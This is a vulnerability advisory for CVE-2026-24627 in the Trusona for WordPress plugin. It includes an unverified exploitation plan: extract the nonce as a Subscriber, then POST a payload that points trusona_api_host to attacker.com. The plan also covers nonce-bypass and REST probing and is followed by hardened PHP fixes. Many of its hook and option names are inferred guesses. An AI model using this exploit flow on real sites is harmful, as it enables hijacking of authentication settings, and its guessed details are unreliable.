CVE-2026-24627

Trusona for WordPress <= 2.0.0 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: Unpatched
Time to patch: N/A

Description

The Trusona for WordPress plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 2.0.0
Published: January 10, 2026
Last updated: February 3, 2026
Affected plugin: trusona
Research Plan
Unverified


This research plan outlines the technical steps to verify and exploit CVE-2026-24627, a missing authorization vulnerability in the Trusona for WordPress plugin.

1. Vulnerability Summary

The Trusona for WordPress plugin (up to version 2.0.0) fails to implement proper capability checks on administrative AJAX handlers. While these handlers may verify a WordPress nonce for CSRF protection, they do not verify whether the authenticated user has the manage_options capability. This allows any authenticated user, including those with Subscriber-level permissions, to execute administrative actions such as modifying plugin settings or triggering API syncs.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Vulnerable Action (Inferred): trusona_save_settings or trusona_sync_users.
  • Required Parameters: action, nonce, and setting-specific parameters (e.g., trusona_enabled, trusona_api_secret).
  • Authentication: Authenticated (Subscriber level or higher).
  • Preconditions: The plugin must be active. The attacker must have a valid login.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler in a file like includes/admin/class-trusona-admin.php or the main trusona.php file using:
    add_action( 'wp_ajax_trusona_save_settings', array( $this, 'save_settings' ) );
  2. Nonce Verification: The save_settings function likely calls check_ajax_referer( 'trusona_save_settings', 'nonce' );.
  3. Missing Check: The function proceeds to update plugin options via update_option() without checking if ( current_user_can( 'manage_options' ) ).
  4. Sink: User-controlled values in $_POST are saved into the WordPress options table, potentially altering the authentication flow (e.g., pointing Trusona to an attacker-controlled API endpoint).
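The handler shape the code flow above infers, shown as an added illustration beside its hardened form. This is not the Trusona plugin's own code (the page does not reproduce it); the hook name trusona_save_settings, the option names and the host allow-list policy are assumptions taken from the plan's inferences. The point is that check_ajax_referer() only proves the request originated from a page that rendered the nonce for the current user; authorization has to be a separate current_user_can() check.

```php
<?php
// Added illustration, not the Trusona plugin's own code. The hook name,
// option names and allow-list policy are assumptions based on the inferred
// code flow, not facts established on this page.

// Vulnerable pattern: nonce verified, capability never checked.
function trusona_save_settings_vulnerable() {
    // check_ajax_referer() is a CSRF control: it confirms the request came from
    // a page that exposed this nonce to the logged-in user. It says nothing
    // about the user's role, so a Subscriber holding the nonce passes it.
    check_ajax_referer( 'trusona_save_settings', 'nonce' );

    // Sink: POST values land in the options table with no authorization check.
    update_option( 'trusona_api_host', sanitize_text_field( wp_unslash( $_POST['trusona_api_host'] ?? '' ) ) );
    update_option( 'trusona_enabled', ! empty( $_POST['trusona_enabled'] ) ? 1 : 0 );
    wp_send_json_success();
}

// Hardened pattern: authorization (capability) check in addition to the nonce.
function trusona_save_settings_fixed() {
    check_ajax_referer( 'trusona_save_settings', 'nonce' );

    // Authorization: only users allowed to manage site options may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $api_host = sanitize_text_field( wp_unslash( $_POST['trusona_api_host'] ?? '' ) );

    // Defence in depth (assumed policy): since this option decides where the
    // authentication flow sends API calls, reject hosts outside the vendor's
    // domain even for administrators.
    if ( '' !== $api_host && ! preg_match( '/(^|\.)trusona\.com$/i', $api_host ) ) {
        wp_send_json_error( array( 'message' => 'Unexpected API host.' ), 400 );
    }

    update_option( 'trusona_api_host', $api_host );
    update_option( 'trusona_enabled', ! empty( $_POST['trusona_enabled'] ) ? 1 : 0 );
    wp_send_json_success();
}

// Register for logged-in users only; deliberately no wp_ajax_nopriv_ variant,
// so unauthenticated requests never reach the handler at all.
add_action( 'wp_ajax_trusona_save_settings', 'trusona_save_settings_fixed' );
```

When auditing a plugin for this class of bug, list every wp_ajax_ hook it registers and confirm each handler contains both a nonce check and a current_user_can() (or equivalent) check before any update_option(), file write or outbound request; a handler with only the former is the pattern described in this CVE.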

4. Nonce Acquisition Strategy

To exploit an authenticated AJAX vulnerability, we need a valid nonce. Nonces for administrative actions are often localized and made available to the browser's global scope.

  1. Locate Localization: Search for wp_localize_script in the plugin source to find the object name and nonce key.
    • Likely Object Name: trusona_admin or trusona_vars.
    • Likely Key: nonce or trusona_nonce.
  2. Identify Page Access: Since Subscribers can access wp-admin/profile.php, check if the plugin enqueues its admin scripts on all admin pages.
  3. Extraction Steps:
    • Log in as a Subscriber.
    • Navigate to /wp-admin/profile.php.
    • Use browser_eval to extract the nonce:
      browser_eval("window.trusona_admin?.nonce || window.trusona_vars?.nonce")
  4. If Nonce is Action-Specific: If the nonce is strictly tied to trusona_save_settings, it might only appear on the plugin's settings page (which a Subscriber cannot access). In this case, check if the plugin uses a generic nonce (action -1) or if another unprivileged AJAX action leaks a usable nonce.

5. Exploitation Strategy

The goal is to modify the plugin's configuration to disable Trusona or redirect API calls.

  • Step 1: Log in as a Subscriber user using the browser_login tool.
  • Step 2: Navigate to the Dashboard or Profile page.
  • Step 3: Execute browser_eval to find the localized nonce variable.
  • Step 4: Send a crafted POST request to admin-ajax.php.

Request Details:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Payload (Example):
    action=trusona_save_settings&nonce=[EXTRACTED_NONCE]&trusona_api_host=attacker.com&trusona_enabled=1

6. Test Data Setup

  1. Install Plugin: Ensure Trusona version 2.0.0 is installed and activated.
  2. Create User: Create a Subscriber user.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Configure Plugin: Set some initial dummy values for Trusona settings as an admin.
    • wp option update trusona_api_host "api.trusona.com"

7. Expected Results

  • Response: The server should return a 200 OK or a JSON success message (e.g., {"success":true}).
  • Database Change: The WordPress option trusona_api_host should be updated to the value provided in the Subscriber's request.
  • Security Impact: Unauthorized modification of security settings by a low-privileged user.

8. Verification Steps

After sending the AJAX request, verify the change using WP-CLI:

  1. Check the modified option:
    wp option get trusona_api_host
  2. If the value is attacker.com, the exploitation is successful.

9. Alternative Approaches

  • Bypassing Nonces: If check_ajax_referer is called with die = false (e.g., check_ajax_referer('act', 'nonce', false)), the script may continue even with an invalid nonce. Test by omitting the nonce parameter.
  • REST API: If the plugin registers REST routes, check for permission_callback. If it is set to __return_true or uses is_user_logged_in(), it is vulnerable.
    • GET /wp-json/trusona/v1/settings
  • Action Probing: If trusona_save_settings fails, search the source for other wp_ajax_ hooks that might be missing authorization, such as trusona_sync or trusona_reset.
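The REST API variant described above, as an added illustration that is not the Trusona plugin's own code: the route trusona/v1/settings is the one named in the plan; the handler function names and argument schema are assumptions. It contrasts a permission_callback that only proves authentication (is_user_logged_in, which a Subscriber satisfies) with one that enforces a capability and returns a proper 403.

```php
<?php
// Added illustration, not the Trusona plugin's own code. Route name from the
// research plan; handler names and the args schema are assumptions.

add_action( 'rest_api_init', function () {
    // Weak: is_user_logged_in() is authentication, not authorization. Any
    // Subscriber can read the settings. __return_true would be worse still,
    // exposing the route to unauthenticated callers.
    register_rest_route( 'trusona/v1', '/settings', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'trusona_rest_get_settings',
        'permission_callback' => 'is_user_logged_in',
    ) );

    // Hardened: the permission_callback checks a capability and returns a
    // WP_Error with status 403 so the client gets an unambiguous denial. The
    // args schema makes WordPress validate and sanitize input before the
    // callback runs.
    register_rest_route( 'trusona/v1', '/settings', array(
        'methods'             => WP_REST_Server::EDITABLE,
        'callback'            => 'trusona_rest_update_settings',
        'permission_callback' => function ( WP_REST_Request $request ) {
            if ( current_user_can( 'manage_options' ) ) {
                return true;
            }
            return new WP_Error(
                'rest_forbidden',
                'Insufficient permissions.',
                array( 'status' => 403 )
            );
        },
        'args' => array(
            'trusona_api_host' => array(
                'type'              => 'string',
                'sanitize_callback' => 'sanitize_text_field',
            ),
            'trusona_enabled' => array(
                'type' => 'boolean',
            ),
        ),
    ) );
} );

function trusona_rest_get_settings( WP_REST_Request $request ) {
    return rest_ensure_response( array(
        'trusona_api_host' => get_option( 'trusona_api_host', '' ),
        'trusona_enabled'  => (bool) get_option( 'trusona_enabled', 0 ),
    ) );
}

function trusona_rest_update_settings( WP_REST_Request $request ) {
    // Only reached after the capability check above has passed.
    $host = $request->get_param( 'trusona_api_host' );
    if ( null !== $host ) {
        update_option( 'trusona_api_host', $host );
    }
    $enabled = $request->get_param( 'trusona_enabled' );
    if ( null !== $enabled ) {
        update_option( 'trusona_enabled', $enabled ? 1 : 0 );
    }
    return rest_ensure_response( array( 'success' => true ) );
}
```

A quick review check is to search the plugin for register_rest_route and read each permission_callback: __return_true, is_user_logged_in, or a closure that returns true unconditionally should be treated the same way as a missing current_user_can() on an AJAX handler.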

Research Findings

Static analysis — not yet PoC-verified

Summary

The Trusona for WordPress plugin (versions 2.0.0 and below) is vulnerable to unauthorized access because its administrative AJAX handlers fail to verify user capabilities. This allows authenticated attackers with Subscriber-level permissions to modify plugin configurations or perform restricted actions by exploiting the lack of a current_user_can() check.

Exploit Outline

  1. Log in to the WordPress site as a user with Subscriber-level access.
  2. Locate the required AJAX nonce by inspecting the localized JavaScript variables (e.g., window.trusona_admin or window.trusona_vars) on accessible admin pages like /wp-admin/profile.php.
  3. Send an authenticated POST request to /wp-admin/admin-ajax.php with the action parameter set to the vulnerable administrative hook (e.g., trusona_save_settings).
  4. Include the extracted nonce and the desired settings parameters (such as trusona_api_host or trusona_enabled) in the request body to modify the plugin's configuration.
